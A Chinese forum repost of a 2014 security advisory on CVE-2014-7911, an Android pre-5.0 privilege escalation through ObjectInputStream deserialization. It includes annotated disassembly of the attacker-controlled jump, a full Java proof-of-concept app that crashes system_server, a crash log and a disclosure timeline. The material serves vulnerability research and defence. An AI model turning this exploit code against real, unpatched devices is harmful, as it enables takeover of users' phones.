android 5.0论坛,Android 安卓5.0以下版本提权漏洞
[资讯]
Android 安卓5.0以下版本提权漏洞
2015-7-10 01:02
946
[资讯]
Android 安卓5.0以下版本提权漏洞
2015-7-10 01:02
946
CVE-2014-7911: Android <5.0 Privilege Escalation using ObjectInputStream
From: Jann Horn
Date: Wed, 19 Nov 2014 02:31:15 +0100
------------------------------------------------------------------------------------------------------------------------------------------
In Android <5.0, java.io.ObjectInputStream did not check whether the Object that is being deserialized is actually serializable. That issue was fixed in Android 5.0 with this commit:
This means that when ObjectInputStream is used on untrusted inputs, an attacker can cause an instance of any class with a non-private parameterless constructor to be created. All fields of that instance can be set to arbitrary values. The malicious object will then typically either be ignored or cast to a type to which it doesn''t fit, implying that no methods will be called on it and no data from it will be used. However, when it is collected by the GC, the GC will call the object''s finalize method.
The android system_service runs under uid 1000 and can change into the context of any app, install new applications with arbitrary permissions and so on. Apps can talk to it using Intents with attached Bundles, Bundles are transferred as arraymap Parcels and arraymap Parcels can contain serialized data. This means that any app can attack the system_service this way.
The class android.os.BinderProxy contains a finalize method that calls into native code. This native code will then use the values of two fields of type int/long (depends on the Android version), cast them to pointers and follow them. On Android 4.4.3, this is where one of those pointers ends up. r0 contains the attacker-supplied pointer, and if the attacker can insert data into the process at a known address, he ends up gaining arbitrary code execution in system_server:
# attacker controls pointer in r0
0000d1c0 <:refbase::decstrong const>:
d1c0: b570 push {r4, r5, r6, lr}
d1c2: 4605 mov r5, r0
d1c4: 6844 ldr r4, [r0, #4] # attacker controls r4
d1c6: 460e mov r6, r1
d1c8: 4620 mov r0, r4
d1ca: f7fd e922 blx a410
d1ce: 2801 cmp r0, #1
d1d0: d10b bne.n d1ea
d1d2: 68a0 ldr r0, [r4, #8] # attacker controls r0
d1d4: 4631 mov r1, r6
d1d6: 6803 ldr r3, [r0, #0] # attacker controls r3
d1d8: 68da ldr r2, [r3, #12] # attacker controls r2
d1da: 4790 blx r2 # jump into attacker-controlled r2 pointer
Android does have ASLR, but like all apps, system_server is forked from the zygote process - in other words, all apps have the same basic memory layout as system_server and should therefore be able to circumvent system_server''s ASLR.
Here''s my crash PoC code. Put it in an android app, install that app, open it. If nothing happens, the GC might be taking its time - try doing other stuff or reopening the PoC app or so. Your device should do something like a reboot after a few seconds.
POC(重启):
package net.thejh.badserial;
import java.io.Serializable;
import java.io.UnsupportedEncodingException;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import dalvik.system.DexClassLoader;
import android.app.Activity;
import android.content.Context;
import android.os.Bundle;
import android.os.IBinder;
import android.os.Parcel;
import android.os.UserHandle;
import android.os.UserManager;
import android.util.Log;
public class MainActivity extends Activity {
private static final java.lang.String DESCRIPTOR = "android.os.IUserManager";
private Class clStub;
private Class clProxy;
private int TRANSACTION_setApplicationRestrictions;
private IBinder mRemote;
public void setApplicationRestrictions(java.lang.String packageName, android.os.Bundle restrictions, int
userHandle) throws android.os.RemoteException
{
android.os.Parcel _data = android.os.Parcel.obtain();
android.os.Parcel _reply = android.os.Parcel.obtain();
try {
_data.writeInterfaceToken(DESCRIPTOR);
_data.writeString(packageName);
_data.writeInt(1);
restrictions.writeToParcel(_data, 0);
_data.writeInt(userHandle);
byte[] data = _data.marshall();
for (int i=0; true; i++) {
if (data[i] == ''A'' && data[i+1] == ''A'' && data[i+2] == ''d'' && data[i+3] == ''r'') {
data[i] = ''a'';
data[i+1] = ''n'';
break;
}
}
_data.recycle();
_data = Parcel.obtain();
_data.unmarshall(data, 0, data.length);
mRemote.transact(TRANSACTION_setApplicationRestrictions, _data, _reply, 0);
_reply.readException();
}
finally {
_reply.recycle();
_data.recycle();
}
}
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
Log.i("badserial", "starting... (v3)");
Context ctx = getBaseContext();
try {
Bundle b = new Bundle();
AAdroid.os.BinderProxy evilProxy = new AAdroid.os.BinderProxy();
b.putSerializable("eatthis", evilProxy);
Class clIUserManager = Class.forName("android.os.IUserManager");
Class[] umSubclasses = clIUserManager.getDeclaredClasses();
System.out.println(umSubclasses.length+" inner classes found");
Class clStub = null;
for (Class c: umSubclasses) {
System.out.println("inner class: "+c.getCanonicalName());
if (c.getCanonicalName().equals("android.os.IUserManager.Stub")) {
clStub = c;
}
}
Field fTRANSACTION_setApplicationRestrictions =
clStub.getDeclaredField("TRANSACTION_setApplicationRestrictions");
fTRANSACTION_setApplicationRestrictions.setAccessible(true);
TRANSACTION_setApplicationRestrictions =
fTRANSACTION_setApplicationRestrictions.getInt(null);
UserManager um = (UserManager) ctx.getSystemService(Context.USER_SERVICE);
Field fService = UserManager.class.getDeclaredField("mService");
fService.setAccessible(true);
Object proxy = fService.get(um);
Class[] stSubclasses = clStub.getDeclaredClasses();
System.out.println(stSubclasses.length+" inner classes found");
clProxy = null;
for (Class c: stSubclasses) {
System.out.println("inner class: "+c.getCanonicalName());
if (c.getCanonicalName().equals("android.os.IUserManager.Stub.Proxy")) {
clProxy = c;
}
}
Field fRemote = clProxy.getDeclaredField("mRemote");
fRemote.setAccessible(true);
mRemote = (IBinder) fRemote.get(proxy);
UserHandle me = android.os.Process.myUserHandle();
setApplicationRestrictions(ctx.getPackageName(), b, me.hashCode());
Log.i("badserial", "waiting for boom here and over in the system service...");
} catch (Exception e) {
throw new RuntimeException(e);
}
}
}
===============================================================================
package AAdroid.os;
import java.io.Serializable;
public class BinderProxy implements Serializable {
private static final long serialVersionUID = 0;
public long mObject = 0x1337beef;
public long mOrgue = 0x1337beef;
}
===============================================================================
This is what you should see in the system log:
F/libc ( 382): Fatal signal 11 (SIGSEGV) at 0x1337bef3 (code=1), thread 391 (FinalizerDaemon)
[...]
I/DEBUG ( 47): pid: 382, tid: 391, name: FinalizerDaemon >>> system_server <<<
I/DEBUG ( 47): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 1337bef3
I/DEBUG ( 47): r0 1337beef r1 b6de7431 r2 b6ee035c r3 81574845
I/DEBUG ( 47): r4 b6de7431 r5 1337beef r6 b7079ec8 r7 1337beef
I/DEBUG ( 47): r8 1337beef r9 abaf5f68 sl b7056678 fp a928bb04
I/DEBUG ( 47): ip b6e1e8c8 sp a928bac8 lr b6de63d9 pc b6e6c15e cpsr 60000030
Timeline:
22.06.2014 - 26.06.2014 issue reported, PoC shared,
issue verified by security () android com
around 03.11.2014 patch published as part of the AOSP code release
07.11.2014 - 19.11.2014 asked Android team whether disclosing this is OK now,
got CVE number from them
-------------------------------------------------------------------------------------
转自:非安全中国网
android 5.0论坛,Android 安卓5.0以下版本提权漏洞相关推荐
- mix2s android p功能,小米MIX2S升级Android P教程 小米mix2s安卓9.0下载地址
原标题:小米MIX2S升级Android P教程 小米mix2s安卓9.0下载地址 谷歌今天正式开启了Android P的测试,如果没多大问题的话就是之后会发布的Android 9.0了,比较惊喜的是 ...
- 三星android6.0和7.0,安卓6.0 Xplay6 对比 安卓7.0三星S7 Edge巅峰对决
原标题:安卓6.0 Xplay6 对比 安卓7.0三星S7 Edge巅峰对决 今年12月份vivo上市了一款他们的旗舰机型vivo Xplay6,它采用全金属机身,正面配备一块 5.46 英寸supe ...
- CVE-2014-7911 Android本地提权漏洞分析与利用
概述 前面我们了解了Android Binder机制的基本原理,当然仅仅了解是不够的,我们要做到:Know it and hack it.这篇文章我们就来分析一个和Binder相关的漏洞:CVE-20 ...
- Android提权漏洞CVE-2014-7920CVE-2014-7921分析
作者:没羽@阿里移动安全,更多技术干货,请访问阿里聚安全博客 这是Android mediaserver的提权漏洞,利用CVE-2014-7920和CVE-2014-7921实现提权,从0权限提到me ...
- android super参数,Android Superuser 提权漏洞分析
近日,国外安全研究人员揭露多款Android平台下的授权应用管理软件存在3个安全漏洞,利用漏洞可进行root. TSRC也对这3个Android Superuser 提权漏洞进行了分析,具体分析情况请 ...
- Android提权漏洞CVE-2014-7920CVE-2014-7921分析 1
没羽@阿里移动安全,更多安全类技术干货,请访问阿里聚安全博客 这是Android mediaserver的提权漏洞,利用CVE-2014-7920和CVE-2014-7921实现提权,从0权限提到me ...
- cve-2014-7911安卓提权漏洞分析
小荷才露尖尖角 · 2015/05/22 10:41 0x00 简介 CVE-2014-7911是由Jann Horn发现的一个有关安卓的提权漏洞,该漏洞允许恶意应用从普通应用权限提权到system用 ...
- android 7.0 官方网址,Android7.0下载地址 安卓7.0系统手机下载安装教程
导 读 安卓系统几乎是普及了所有人的手机,虽然6.0的安装率有点惨不忍睹,但是最近谷歌又有了新动作,在即将推出的安卓7.0系统又有哪些值得我们期待的功能呢?下面和小编一起去看看吧! 虽然Android ...
- android 7下载地址,Android7.0下载地址 安卓7.0系统手机下载安装教程
安卓系统几乎是普及了所有人的手机,虽然6.0的安装率有点惨不忍睹,但是最近谷歌又有了新动作,在即将推出的安卓7.0系统又有哪些值得我们期待的功能呢?下面和小编一起去看看吧! 虽然Android 6.0 ...
- android 7.0下载地址,安卓7.0系统手机下载安装教程 Android7.0下载地址
导 读 安卓系统几乎是普及了所有人的手机,虽然6.0的安装率有点惨不忍睹,但是最近谷歌又有了新动作,在即将推出的安卓7.0系统又有哪些值得我们期待的功能呢?下面和小编一起去看看吧! 虽然Android ...
最新文章
- centos把mysql移到数据盘_Centos转移Mysql的数据位置
- python读取excel-蜗牛笔记-文章-Python读取Excel文件
- Sublime Less 自动编译成css
- 【深度学习】CV和NLP通吃!谷歌提出OmniNet:Transformers的全方位表示
- wandb: 深度学习轻量级可视化工具入门教程
- 【算法】 - 滑动窗口
- 【开源项目】基于FFmpeg的封装格式转换
- 深度剖析SOC高性能实时事件关联分析引擎
- 阿里云MVP第六期发布——覆盖全球20多个国家和地区,成为数字化转型的中坚力量...
- 【Kafka】Kafka 使用传统的 avro API 自定义序列化类和反序列化类
- 架构之旅~一个操作的返回要有一个标准,看我的公用消息类
- SpringAop源码一:通知方法优先级
- cru使用教程_显示器刷新率超频教程
- python代码怎么保存为pdf_如何在Selenium(Python)中将打开的页面保存为pdf
- 矩阵的卷积以及使用python计算方法
- 初学者Apache Solr教程
- 服务器获取交换机端口状态,如何查找交换机端口对应的IP地址
- VUE获取节日(中国节+国际节)
- 中国石油大学《微观经济学》第一次在线作业
- 编译go文件时内部包引用受限的问题(use of internal package /PATH/ not allowed)